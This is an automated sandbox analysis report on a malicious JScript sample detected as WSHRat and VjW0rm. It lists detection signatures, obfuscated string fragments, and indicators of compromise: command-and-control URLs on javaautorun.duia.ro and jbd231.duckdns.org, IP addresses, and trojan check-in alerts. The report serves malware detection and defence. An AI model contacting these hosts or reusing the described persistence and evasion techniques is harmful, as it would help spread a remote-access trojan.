Windows Analysis Report
Order Requirement 2022.js

Overview

General Information

Sample Name: Order Requirement 2022.js
Analysis ID: 715072
MD5: e873a424159d2557551d0f4684af7a5f
SHA1: 7dfcc66a95100143fae12531151355d2016718f0
SHA256: 0d5a587f0c1dcff512f6112ee48859608db08307aa39887cc71480998d7070d4
Tags: jsVjw0rm
Infos:

Detection

WSHRat, VjW0rm
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Yara detected WSHRAT
Detected WSHRat
System process connects to network (likely due to code injection or exploit)
Sigma detected: Register Wscript In Run Key
JScript performs obfuscated calls to suspicious functions
Yara detected VjW0rm
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Sigma detected: Drops script at startup location
Sigma detected: VjW0rm
Snort IDS alert for network traffic
Wscript called in batch mode (surpress errors)
Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
JavaScript source code contains functionality to generate code involving a shell, file or stream
Potential malicious VBS/JS script found (suspicious encoded strings)
Drops script or batch files to the startup folder
Uses known network protocols on non-standard ports
Uses dynamic DNS services
AV process strings found (often used to terminate AV products)
Java / VBScript file with very long strings (likely obfuscated code)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to query the security center for anti-virus and firewall products
Detected TCP or UDP traffic on non-standard ports
Internet Provider seen in connection with other malware
Creates a start menu entry (Start Menu\Programs\Startup)
Stores files to the Windows start menu directory
Creates a process in suspended mode (likely to inject code)
IP address seen in connection with other malware
Found WSH timer for Javascript or VBS script (likely evasive script)

Classification

AV Detection

barindex
Source: http://javaautorun.duia.ro:5465/VreM3:.0 Avira URL Cloud: Label: malware
Source: http://javaautorun.duia.ro:5465/Vrew Avira URL Cloud: Label: malware
Source: http://javaautorun.duia.ro:5465/Vrecnkgew0KhN Avira URL Cloud: Label: malware
Source: http://javaautorun.duia.ro:5465/Vre63209-4053062332-100 Avira URL Cloud: Label: malware
Source: http://javaautorun.duia.ro:5465/Vre Avira URL Cloud: Label: malware
Source: http://javaautorun.duia.ro:5465/Vre.duia.ro:5465/Vre Avira URL Cloud: Label: malware
Source: http://javaautorun.duia.ro:5465/VreYWNlKCIl Avira URL Cloud: Label: malware
Source: http://javaautorun.duia.ro:5465/Vred Avira URL Cloud: Label: malware
Source: http://javaautorun.duia.ro:5465/Vrecnkgew0K Avira URL Cloud: Label: malware
Source: http://javaautorun.duia.ro:5465/Vrero6 Avira URL Cloud: Label: malware
Source: http://javaautorun.duia.ro:5465/VreMC Avira URL Cloud: Label: malware
Source: http://javaautorun.duia.ro:5465/ Avira URL Cloud: Label: malware
Source: http://javaautorun.duia.ro:5465/Vreoh_AE Avira URL Cloud: Label: malware
Source: http://javaautorun.duia.ro:5465/VreY Avira URL Cloud: Label: malware
Source: http://javaautorun.duia.ro:5465/Vresofdowches Avira URL Cloud: Label: malware
Source: http://javaautorun.duia.ro:5465/Vrer Avira URL Cloud: Label: malware
Source: http://javaautorun.duia.ro:5465/Vreo Avira URL Cloud: Label: malware
Source: http://javaautorun.duia.ro:5465/VreConnectionKeep-Alive Avira URL Cloud: Label: malware
Source: http://javaautorun.duia.ro:5465/VredmFyIGZyhN Avira URL Cloud: Label: malware
Source: http://javaautorun.duia.ro:5465/Vrej Avira URL Cloud: Label: malware
Source: http://javaautorun.duia.ro:5465/ZpbGU Avira URL Cloud: Label: malware
Source: http://javaautorun.duia.ro:5465/Vrel Avira URL Cloud: Label: malware
Source: http://javaautorun.duia.ro:5465/Vre$K Avira URL Cloud: Label: malware
Source: http://javaautorun.duia.ro:5465/Vref Avira URL Cloud: Label: malware
Source: http://javaautorun.duia.ro:5465/Vreh Avira URL Cloud: Label: malware
Source: http://javaautorun.duia.ro:5465/Vre: Avira URL Cloud: Label: malware
Source: http://javaautorun.duia.ro:5465/VreMe Avira URL Cloud: Label: malware
Source: http://javaautorun.duia.ro:5465/VreZXNwb25z Avira URL Cloud: Label: malware
Source: http://javaautorun.duia.ro:5465/VreZXNwb25zf/ Avira URL Cloud: Label: malware
Source: http://javaautorun.duia.ro:5465/VreS Avira URL Cloud: Label: malware
Source: http://javaautorun.duia.ro:5465/VreN Avira URL Cloud: Label: malware
Source: http://javaautorun.duia.ro:5465/VreM Avira URL Cloud: Label: malware
Source: http://javaautorun.duia.ro:5465/VredmFyIGZy Avira URL Cloud: Label: malware
Source: http://javaautorun.duia.ro:5465/Vre# Avira URL Cloud: Label: malware
Source: http://javaautorun.duia.ro:5465/Vre1_ Avira URL Cloud: Label: malware
Source: http://javaautorun.duia.ro:5465/Vres); Avira URL Cloud: Label: malware
Source: http://javaautorun.duia.ro:5465/Vre. Avira URL Cloud: Label: malware
Source: http://javaautorun.duia.ro:5465/Vreoi Avira URL Cloud: Label: malware
Source: http://javaautorun.duia.ro:5465/Vre0 Avira URL Cloud: Label: malware
Source: http://javaautorun.duia.ro:5465/VrehN Avira URL Cloud: Label: malware
Source: http://javaautorun.duia.ro:5465/Vreor Avira URL Cloud: Label: malware
Source: jbd231.duckdns.org Virustotal: Detection: 13% Perma Link
Source: javaautorun.duia.ro Virustotal: Detection: 12% Perma Link
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData Jump to behavior

Software Vulnerabilities

barindex
Source: Order Requirement 2022.js Return value : ['"adodb.stream"'] Go to definition
Source: Order Requirement 2022.js Return value : ['"adodb.stream"'] Go to definition
Source: Order Requirement 2022.js Return value : ['"adodb.stream"', 'bin.base64,7PdAJRt,replace,7365HgEKJQ,shift,Type,535JemZUP,56aEstzl,213970IFnRnT,612VSSUeT,use stric'] Go to definition
Source: Order Requirement 2022.js Return value : ['"adodb.stream"', 'bin.base64,7PdAJRt,replace,7365HgEKJQ,shift,Type,535JemZUP,56aEstzl,213970IFnRnT,612VSSUeT,use stric'] Go to definition
Source: Order Requirement 2022.js Return value : ['"adodb.stream"', 'mko,56aEstzl,Open,us-ascii,2382rQRreo,Type,151212NeWBHv,171iXGpSV,173920wjKeEW,213970IFnRnT,100300Vu', 'bin.base64,7PdAJRt,replace,7365HgEKJQ,shift,Type,535JemZUP,56aEstzl,213970IFnRnT,612VSSUeT,use stric'] Go to definition
Source: Order Requirement 2022.js Return value : ['"adodb.stream"', 'mko,56aEstzl,Open,us-ascii,2382rQRreo,Type,151212NeWBHv,171iXGpSV,173920wjKeEW,213970IFnRnT,100300Vu', 'bin.base64,7PdAJRt,replace,7365HgEKJQ,shift,Type,535JemZUP,56aEstzl,213970IFnRnT,612VSSUeT,use stric'] Go to definition
Source: Order Requirement 2022.js Return value : ['"adodb.stream"', 'mko,56aEstzl,Open,us-ascii,2382rQRreo,Type,151212NeWBHv,171iXGpSV,173920wjKeEW,213970IFnRnT,100300Vu', 'bin.base64,7PdAJRt,replace,7365HgEKJQ,shift,Type,535JemZUP,56aEstzl,213970IFnRnT,612VSSUeT,use stric'] Go to definition
Source: Order Requirement 2022.js Return value : ['"adodb.stream"', 'mko,56aEstzl,Open,us-ascii,2382rQRreo,Type,151212NeWBHv,171iXGpSV,173920wjKeEW,213970IFnRnT,100300Vu', 'bin.base64,7PdAJRt,replace,7365HgEKJQ,shift,Type,535JemZUP,56aEstzl,213970IFnRnT,612VSSUeT,use stric'] Go to definition
Source: Order Requirement 2022.js Return value : ['"adodb.stream"', 'mko,56aEstzl,Open,us-ascii,2382rQRreo,Type,151212NeWBHv,171iXGpSV,173920wjKeEW,213970IFnRnT,100300Vu', 'bin.base64,7PdAJRt,replace,7365HgEKJQ,shift,Type,535JemZUP,56aEstzl,213970IFnRnT,612VSSUeT,use stric'] Go to definition
Source: Order Requirement 2022.js Return value : ['"adodb.stream"', 'mko,56aEstzl,Open,us-ascii,2382rQRreo,Type,151212NeWBHv,171iXGpSV,173920wjKeEW,213970IFnRnT,100300Vu', 'bin.base64,7PdAJRt,replace,7365HgEKJQ,shift,Type,535JemZUP,56aEstzl,213970IFnRnT,612VSSUeT,use stric'] Go to definition
Source: Order Requirement 2022.js Return value : ['"adodb.stream"', 'mko,56aEstzl,Open,us-ascii,2382rQRreo,Type,151212NeWBHv,171iXGpSV,173920wjKeEW,213970IFnRnT,100300Vu', 'bin.base64,7PdAJRt,replace,7365HgEKJQ,shift,Type,535JemZUP,56aEstzl,213970IFnRnT,612VSSUeT,use stric'] Go to definition
Source: Order Requirement 2022.js Return value : ['"adodb.stream"', 'mko,56aEstzl,Open,us-ascii,2382rQRreo,Type,151212NeWBHv,171iXGpSV,173920wjKeEW,213970IFnRnT,100300Vu', 'bin.base64,7PdAJRt,replace,7365HgEKJQ,shift,Type,535JemZUP,56aEstzl,213970IFnRnT,612VSSUeT,use stric'] Go to definition
Source: Order Requirement 2022.js Return value : ['"adodb.stream"', 'mko,56aEstzl,Open,us-ascii,2382rQRreo,Type,151212NeWBHv,171iXGpSV,173920wjKeEW,213970IFnRnT,100300Vu', 'bin.base64,7PdAJRt,replace,7365HgEKJQ,shift,Type,535JemZUP,56aEstzl,213970IFnRnT,612VSSUeT,use stric'] Go to definition
Source: Order Requirement 2022.js Return value : ['"adodb.stream"', 'mko,56aEstzl,Open,us-ascii,2382rQRreo,Type,151212NeWBHv,171iXGpSV,173920wjKeEW,213970IFnRnT,100300Vu', 'bin.base64,7PdAJRt,replace,7365HgEKJQ,shift,Type,535JemZUP,56aEstzl,213970IFnRnT,612VSSUeT,use stric'] Go to definition
Source: Order Requirement 2022.js Return value : ['"adodb.stream"', 'mko,56aEstzl,Open,us-ascii,2382rQRreo,Type,151212NeWBHv,171iXGpSV,173920wjKeEW,213970IFnRnT,100300Vu', 'bin.base64,7PdAJRt,replace,7365HgEKJQ,shift,Type,535JemZUP,56aEstzl,213970IFnRnT,612VSSUeT,use stric'] Go to definition
Source: Order Requirement 2022.js Return value : ['"adodb.stream"', 'mko,56aEstzl,Open,us-ascii,2382rQRreo,Type,151212NeWBHv,171iXGpSV,173920wjKeEW,213970IFnRnT,100300Vu', 'bin.base64,7PdAJRt,replace,7365HgEKJQ,shift,Type,535JemZUP,56aEstzl,213970IFnRnT,612VSSUeT,use stric'] Go to definition
Source: Order Requirement 2022.js Return value : ['"adodb.stream"', 'mko,56aEstzl,Open,us-ascii,2382rQRreo,Type,151212NeWBHv,171iXGpSV,173920wjKeEW,213970IFnRnT,100300Vu', 'bin.base64,7PdAJRt,replace,7365HgEKJQ,shift,Type,535JemZUP,56aEstzl,213970IFnRnT,612VSSUeT,use stric'] Go to definition

Networking

barindex
Source: C:\Windows\System32\wscript.exe Domain query: jbd231.duckdns.org
Source: C:\Windows\System32\wscript.exe Network Connect: 109.248.150.138 2022
Source: C:\Windows\System32\wscript.exe Network Connect: 154.120.126.87 5465
Source: C:\Windows\System32\wscript.exe Domain query: javaautorun.duia.ro
Source: C:\Windows\System32\wscript.exe Network Connect: 109.248.144.237 2022 Jump to behavior
Source: Traffic Snort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.5:49726 -> 109.248.150.138:2022
Source: Traffic Snort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.5:49728 -> 109.248.150.138:2022
Source: Traffic Snort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.5:49732 -> 109.248.150.138:2022
Source: Traffic Snort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.5:49733 -> 109.248.150.138:2022
Source: Traffic Snort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.5:49737 -> 109.248.150.138:2022
Source: Traffic Snort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.5:49740 -> 109.248.150.138:2022
Source: Traffic Snort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.5:49743 -> 109.248.150.138:2022
Source: Traffic Snort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.5:49747 -> 109.248.150.138:2022
Source: Traffic Snort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.5:49749 -> 109.248.150.138:2022
Source: Traffic Snort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.5:49752 -> 109.248.150.138:2022
Source: Traffic Snort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.5:49754 -> 109.248.150.138:2022
Source: Traffic Snort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.5:49758 -> 109.248.150.138:2022
Source: Traffic Snort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.5:49762 -> 109.248.150.138:2022
Source: Traffic Snort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.5:49764 -> 109.248.150.138:2022
Source: Traffic Snort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.5:49767 -> 109.248.150.138:2022
Source: Traffic Snort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.5:49770 -> 109.248.150.138:2022
Source: Traffic Snort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.5:49774 -> 109.248.150.138:2022
Source: Traffic Snort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.5:49777 -> 109.248.150.138:2022
Source: Traffic Snort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.5:49779 -> 109.248.150.138:2022
Source: Traffic Snort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.5:49782 -> 109.248.150.138:2022
Source: Traffic Snort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.5:49785 -> 109.248.150.138:2022
Source: Traffic Snort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.5:49789 -> 109.248.150.138:2022
Source: Traffic Snort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.5:49792 -> 109.248.150.138:2022
Source: Traffic Snort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.5:49795 -> 109.248.150.138:2022
Source: Traffic Snort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.5:49796 -> 109.248.150.138:2022
Source: Traffic Snort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.5:49800 -> 109.248.150.138:2022
Source: Traffic Snort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.5:49803 -> 109.248.150.138:2022
Source: Traffic Snort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.5:49806 -> 109.248.150.138:2022
Source: unknown Network traffic detected: HTTP traffic on port 49726 -> 2022
Source: unknown Network traffic detected: HTTP traffic on port 49728 -> 2022
Source: unknown Network traffic detected: HTTP traffic on port 49732 -> 2022
Source: unknown Network traffic detected: HTTP traffic on port 49733 -> 2022
Source: unknown Network traffic detected: HTTP traffic on port 49737 -> 2022
Source: unknown Network traffic detected: HTTP traffic on port 49740 -> 2022
Source: unknown Network traffic detected: HTTP traffic on port 49743 -> 2022
Source: unknown Network traffic detected: HTTP traffic on port 49747 -> 2022
Source: unknown Network traffic detected: HTTP traffic on port 49749 -> 2022
Source: unknown Network traffic detected: HTTP traffic on port 49752 -> 2022
Source: unknown Network traffic detected: HTTP traffic on port 49754 -> 2022
Source: unknown Network traffic detected: HTTP traffic on port 49758 -> 2022
Source: unknown Network traffic detected: HTTP traffic on port 49762 -> 2022
Source: unknown Network traffic detected: HTTP traffic on port 49764 -> 2022
Source: unknown Network traffic detected: HTTP traffic on port 49767 -> 2022
Source: unknown Network traffic detected: HTTP traffic on port 49770 -> 2022
Source: unknown Network traffic detected: HTTP traffic on port 49774 -> 2022
Source: unknown Network traffic detected: HTTP traffic on port 49777 -> 2022
Source: unknown Network traffic detected: HTTP traffic on port 49779 -> 2022
Source: unknown Network traffic detected: HTTP traffic on port 49782 -> 2022
Source: unknown Network traffic detected: HTTP traffic on port 49785 -> 2022
Source: unknown Network traffic detected: HTTP traffic on port 49789 -> 2022
Source: unknown Network traffic detected: HTTP traffic on port 49792 -> 2022
Source: unknown Network traffic detected: HTTP traffic on port 49795 -> 2022
Source: unknown Network traffic detected: HTTP traffic on port 49796 -> 2022
Source: unknown Network traffic detected: HTTP traffic on port 49800 -> 2022
Source: unknown Network traffic detected: HTTP traffic on port 49803 -> 2022
Source: unknown Network traffic detected: HTTP traffic on port 49806 -> 2022
Source: unknown DNS query: name: jbd231.duckdns.org
Source: global traffic TCP traffic: 192.168.2.5:49700 -> 154.120.126.87:5465
Source: global traffic TCP traffic: 192.168.2.5:49701 -> 109.248.144.237:2022
Source: global traffic TCP traffic: 192.168.2.5:49726 -> 109.248.150.138:2022
Source: Joe Sandbox View ASN Name: DATACLUBLV DATACLUBLV
Source: Joe Sandbox View ASN Name: SpectranetNG SpectranetNG
Source: Joe Sandbox View IP Address: 109.248.150.138 109.248.150.138
Source: wscript.exe, 0000000E.00000003.481502625.000001E45640E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000E.00000002.816513877.000000D86C2F2000.00000004.00000010.00020000.00000000.sdmp, wscript.exe, 0000000E.00000003.546074627.000001E4563F2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000E.00000002.847586711.000001E4568C0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://javaautorun.duia.ro:5465/
Source: wscript.exe, 0000000E.00000002.891459957.000001E456AA0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://javaautorun.duia.ro:5465/Vre
Source: wscript.exe, 0000000E.00000002.892699772.000001E4570B0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://javaautorun.duia.ro:5465/Vre#
Source: wscript.exe, 0000000C.00000002.844278843.000001531A030000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://javaautorun.duia.ro:5465/Vre$K
Source: wscript.exe, 0000000E.00000002.892699772.000001E4570B0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://javaautorun.duia.ro:5465/Vre.
Source: wscript.exe, 00000004.00000002.882445640.0000020016851000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://javaautorun.duia.ro:5465/Vre.duia.ro:5465/Vre
Source: wscript.exe, 00000001.00000003.379518455.00000228B31AF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://javaautorun.duia.ro:5465/Vre0
Source: wscript.exe, 0000000E.00000002.819896845.000001E4548B8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://javaautorun.duia.ro:5465/Vre1_
Source: wscript.exe, 00000006.00000002.848811043.0000026E2ADF0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000E.00000002.847586711.000001E4568C0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://javaautorun.duia.ro:5465/Vre63209-4053062332-100
Source: wscript.exe, 0000000E.00000002.892699772.000001E4570B0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://javaautorun.duia.ro:5465/Vre:
Source: wscript.exe, 00000004.00000002.854554678.0000020016790000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://javaautorun.duia.ro:5465/VreConnectionKeep-Alive
Source: wscript.exe, 00000001.00000002.851874113.00000228B3130000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000002.856776176.0000026E2AE71000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000002.835362703.0000029D802A1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.854455926.000001531A0E6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://javaautorun.duia.ro:5465/VreM
Source: wscript.exe, 0000000C.00000002.854455926.000001531A0E6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://javaautorun.duia.ro:5465/VreM3:.0
Source: wscript.exe, 00000004.00000002.854554678.0000020016790000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://javaautorun.duia.ro:5465/VreMC
Source: wscript.exe, 00000008.00000002.869225763.0000029DFD7E8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://javaautorun.duia.ro:5465/VreMe
Source: wscript.exe, 0000000C.00000002.858724337.000001531A102000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://javaautorun.duia.ro:5465/VreN
Source: wscript.exe, 0000000C.00000002.844278843.000001531A030000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://javaautorun.duia.ro:5465/VreS
Source: wscript.exe, 00000006.00000002.875779129.0000026E2AEF0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://javaautorun.duia.ro:5465/VreY
Source: wscript.exe, 00000001.00000002.847538264.00000228B2A80000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000002.842409404.0000020016230000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000002.846562471.0000026E2A810000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000002.827729174.0000029D80190000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://javaautorun.duia.ro:5465/VreYWNlKCIl
Source: wscript.exe, 00000001.00000002.847538264.00000228B2A80000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://javaautorun.duia.ro:5465/VreZXNwb25z
Source: wscript.exe, 00000004.00000002.842409404.0000020016230000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://javaautorun.duia.ro:5465/VreZXNwb25zf/
Source: wscript.exe, 00000001.00000002.847538264.00000228B2A80000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000002.842409404.0000020016230000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000002.846562471.0000026E2A810000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000002.827729174.0000029D80190000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.843831563.000001531A020000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://javaautorun.duia.ro:5465/Vrecnkgew0K
Source: wscript.exe, 0000000E.00000002.891459957.000001E456AA0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://javaautorun.duia.ro:5465/Vrecnkgew0KhN
Source: wscript.exe, 00000004.00000002.892957672.0000020016F08000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://javaautorun.duia.ro:5465/Vred
Source: wscript.exe, 00000001.00000002.847538264.00000228B2A80000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000002.842409404.0000020016230000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000002.846562471.0000026E2A810000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000002.827729174.0000029D80190000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.843831563.000001531A020000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://javaautorun.duia.ro:5465/VredmFyIGZy
Source: wscript.exe, 0000000E.00000002.891459957.000001E456AA0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://javaautorun.duia.ro:5465/VredmFyIGZyhN
Source: wscript.exe, 0000000E.00000002.847586711.000001E4568C0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://javaautorun.duia.ro:5465/Vref
Source: wscript.exe, 00000004.00000002.882445640.0000020016851000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000002.835362703.0000029D802A1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000E.00000002.869237827.000001E456940000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://javaautorun.duia.ro:5465/Vreh
Source: wscript.exe, 0000000E.00000002.891459957.000001E456AA0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://javaautorun.duia.ro:5465/VrehN
Source: wscript.exe, 00000001.00000002.851874113.00000228B3130000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.379274839.00000228B317E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.378710691.00000228B3161000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://javaautorun.duia.ro:5465/Vrej
Source: wscript.exe, 0000000C.00000002.858724337.000001531A102000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://javaautorun.duia.ro:5465/Vrel
Source: wscript.exe, 00000004.00000002.882445640.0000020016851000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000002.835362703.0000029D802A1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000E.00000002.869237827.000001E456940000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://javaautorun.duia.ro:5465/Vreo
Source: wscript.exe, 00000001.00000002.851874113.00000228B3130000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://javaautorun.duia.ro:5465/Vreoh_AE
Source: wscript.exe, 00000008.00000002.869225763.0000029DFD7E8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://javaautorun.duia.ro:5465/Vreoi
Source: wscript.exe, 00000006.00000002.848811043.0000026E2ADF0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://javaautorun.duia.ro:5465/Vreor
Source: wscript.exe, 00000006.00000002.856776176.0000026E2AE71000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://javaautorun.duia.ro:5465/Vrer
Source: wscript.exe, 00000001.00000003.378710691.00000228B3161000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://javaautorun.duia.ro:5465/Vrero6
Source: wscript.exe, 00000001.00000002.847538264.00000228B2A80000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000002.842409404.0000020016230000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000002.846562471.0000026E2A810000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000002.827729174.0000029D80190000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.843831563.000001531A020000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000E.00000002.891459957.000001E456AA0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://javaautorun.duia.ro:5465/Vres);
Source: wscript.exe, 00000001.00000003.378710691.00000228B3161000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://javaautorun.duia.ro:5465/Vresofdowches
Source: wscript.exe, 00000006.00000002.875779129.0000026E2AEF0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://javaautorun.duia.ro:5465/Vrew
Source: wscript.exe, 00000008.00000003.394109169.0000029D8001A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://javaautorun.duia.ro:5465/ZpbGU
Source: wscript.exe, 00000002.00000003.401450984.0000025291BC4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.400937487.0000025291B6D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000002.893140463.0000025291BBB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.401267934.0000025291B77000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.401644606.0000025291B83000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000002.889666132.0000025291B7B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000003.525815657.000001B9F4459000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000003.525315950.000001B9F448D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000003.525373780.000001B9F444C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000003.525509334.000001B9F4453000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000003.524400656.000001B9F443D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000002.893638808.000001B9F444E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000003.525031245.000001B9F4445000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://jbd231.duckdns.org/
